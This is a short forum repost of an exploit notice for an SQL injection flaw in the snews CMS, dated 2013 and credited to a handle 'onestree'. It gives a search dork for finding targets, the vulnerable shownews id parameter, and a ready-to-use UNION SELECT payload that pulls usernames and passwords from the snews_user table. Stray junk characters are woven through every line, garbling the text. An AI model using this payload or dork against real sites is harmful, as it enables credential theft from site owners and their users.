标题: CMS snews SQL Injection Vulnerability6 S1 h1 B+ _$ v/ z
作者: By onestree% ^% R4 [3 o8 |+ U. Z% m* i
下载地址 : http://snewscms.com/6 h. x/ ~: v, q) T( e, m1 q2 r
测试平台 : ubuntu 12.10 / win 7
! b, P. {; s) Z4 p/ k" N关键词: inurl:"tanyakan pada rumput yang bergoyang"0 ] d# x O' K0 z# d& O+ l: W
9 U. J( X- I" M. U! n0 h
3 w; M5 z# s6 h5 Q% h T*************************************************************
$ w3 K' C, g6 ]0 s2 I 6 E% c" w- D: n0 G$ `: m
SQL poc:
# D6 f; [. |' s7 H4 [ ( M/ y! A. F6 L( H; n
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
7 p f3 k% B- b; G 0 \: N/ E7 g1 e, H- G0 {
示例
! v& b, {% _/ f1 T
, X( H& S3 [/ h( Hhttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*# T$ P$ V3 O( r4 @( L' R& v
: }, [8 x! T6 H! _6 ]$ y' r2 z
" y* U7 w$ n! g0 X. U致谢:
. o1 M( X0 h: P v% }: {( M' i$ j9 Z3 k0 k1 ~& V
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
4 n( h0 R3 ?* s( N- l$ g4 E/ u- j4 W$ i ' F) x; \/ ~0 S
indonesiancoder - moeslimh4x0r - go-coder# a+ L: M5 X2 ^6 Q0 F T
: ^$ a s2 V4 ~$ l
spesial my hunny :*) Q" f5 U8 d) X! E
|
发表于 2013-1-23 08:55:06
收藏
支持
反对